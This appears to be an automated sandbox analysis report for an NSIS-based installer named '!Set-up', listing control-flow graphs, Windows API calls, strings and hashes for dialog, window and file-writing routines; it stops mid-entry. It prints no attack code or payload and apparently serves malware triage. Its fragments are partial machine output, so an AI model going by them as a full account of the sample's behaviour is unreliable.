                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                              • DestroyWindow.USER32 ref: 00405512
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID:
                                                              • API String ID: 3282139019-0
                                                              • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                              • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                              Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                              APIs
                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                              • API String ID: 608394941-2746725676
                                                              • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                              • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                              Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • lstrcatW.KERNEL32(00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401A76
                                                              • CompareFileTime.KERNEL32(-00000014,?,%IsraeliSales%,%IsraeliSales%,00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                              • String ID: %IsraeliSales%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                              • API String ID: 4286501637-1599634701
                                                              • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                              • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                              Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 653 40337f-403398 654 4033a1-4033a9 653->654 655 40339a 653->655 656 4033b2-4033b7 654->656 657 4033ab 654->657 655->654 658 4033c7-4033d4 call 403336 656->658 659 4033b9-4033c2 call 403368 656->659 657->656 663 4033d6 658->663 664 4033de-4033e5 658->664 659->658 665 4033d8-4033d9 663->665 666 403546-403548 664->666 667 4033eb-403432 GetTickCount 664->667 670 403567-40356b 665->670 668 40354a-40354d 666->668 669 4035ac-4035af 666->669 671 403564 667->671 672 403438-403440 667->672 673 403552-40355b call 403336 668->673 674 40354f 668->674 675 4035b1 669->675 676 40356e-403574 669->676 671->670 677 403442 672->677 678 403445-403453 call 403336 672->678 673->663 686 403561 673->686 674->673 675->671 681 403576 676->681 682 403579-403587 call 403336 676->682 677->678 678->663 687 403455-40345e 678->687 681->682 682->663 690 40358d-40359f WriteFile 682->690 686->671 689 403464-403484 call 4076a0 687->689 696 403538-40353a 689->696 697 40348a-40349d GetTickCount 689->697 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 692->693 695 4035a6-4035a9 692->695 693->665 695->669 696->665 698 4034e8-4034ec 697->698 699 40349f-4034a7 697->699 700 40352d-403530 698->700 701 4034ee-4034f1 698->701 702 4034a9-4034ad 699->702 703 4034af-4034e0 MulDiv wsprintfW call 404f9e 699->703 700->672 707 403536 700->707 705 403513-40351e 701->705 706 4034f3-403507 WriteFile 701->706 702->698 702->703 708 4034e5 703->708 710 403521-403525 705->710 706->693 709 403509-40350c 706->709 707->671 708->698 709->693 711 40350e-403511 709->711 710->689 712 40352b 710->712 711->710 712->671
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                              • wsprintfW.USER32 ref: 004034CE
                                                              • WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CountFileTickWrite$wsprintf
                                                              • String ID: (]C$... %d%%$pAB$vyB$y9B
                                                              • API String ID: 651206458-2231457358
                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                              Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 713 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 716 403603-403608 713->716 717 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 713->717 718 4037e2-4037e6 716->718 725 403641 717->725 726 403728-403736 call 4032d2 717->726 728 403646-40365d 725->728 732 4037f1-4037f6 726->732 733 40373c-40373f 726->733 730 403661-403663 call 403336 728->730 731 40365f 728->731 737 403668-40366a 730->737 731->730 732->718 735 403741-403759 call 403368 call 403336 733->735 736 40376b-403795 GlobalAlloc call 403368 call 40337f 733->736 735->732 764 40375f-403765 735->764 736->732 762 403797-4037a8 736->762 740 403670-403677 737->740 741 4037e9-4037f0 call 4032d2 737->741 742 4036f3-4036f7 740->742 743 403679-40368d call 405e38 740->743 741->732 749 403701-403707 742->749 750 4036f9-403700 call 4032d2 742->750 743->749 760 40368f-403696 743->760 753 403716-403720 749->753 754 403709-403713 call 4072ad 749->754 750->749 753->728 761 403726 753->761 754->753 760->749 766 403698-40369f 760->766 761->726 767 4037b0-4037b3 762->767 768 4037aa 762->768 764->732 764->736 766->749 769 4036a1-4036a8 766->769 770 4037b6-4037be 767->770 768->767 769->749 771 4036aa-4036b1 769->771 770->770 772 4037c0-4037db SetFilePointer call 405e38 770->772 771->749 773 4036b3-4036d3 771->773 776 4037e0 772->776 773->732 775 4036d9-4036dd 773->775 777 4036e5-4036ed 775->777 778 4036df-4036e3 775->778 776->718 777->749 779 4036ef-4036f1 777->779 778->761 778->777 779->749
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                              Strings
                                                              • soft, xrefs: 004036A1
                                                              • Null, xrefs: 004036AA
                                                              • Error launching installer, xrefs: 00403603
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                              • Inst, xrefs: 00403698
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 4283519449-527102705
                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                              Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                              APIs
                                                              • lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                              • lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
